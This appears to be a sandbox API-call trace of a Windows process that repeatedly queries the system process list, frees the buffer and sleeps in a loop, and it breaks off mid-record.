[0164.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.943] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0164.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0164.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0164.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0164.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0164.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0164.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0164.990] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.037] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.084] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.130] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.177] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.287] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.380] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.427] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.473] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.567] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.614] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.662] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.754] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.777] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0165.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0165.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0165.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0165.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0165.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0165.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0165.799] 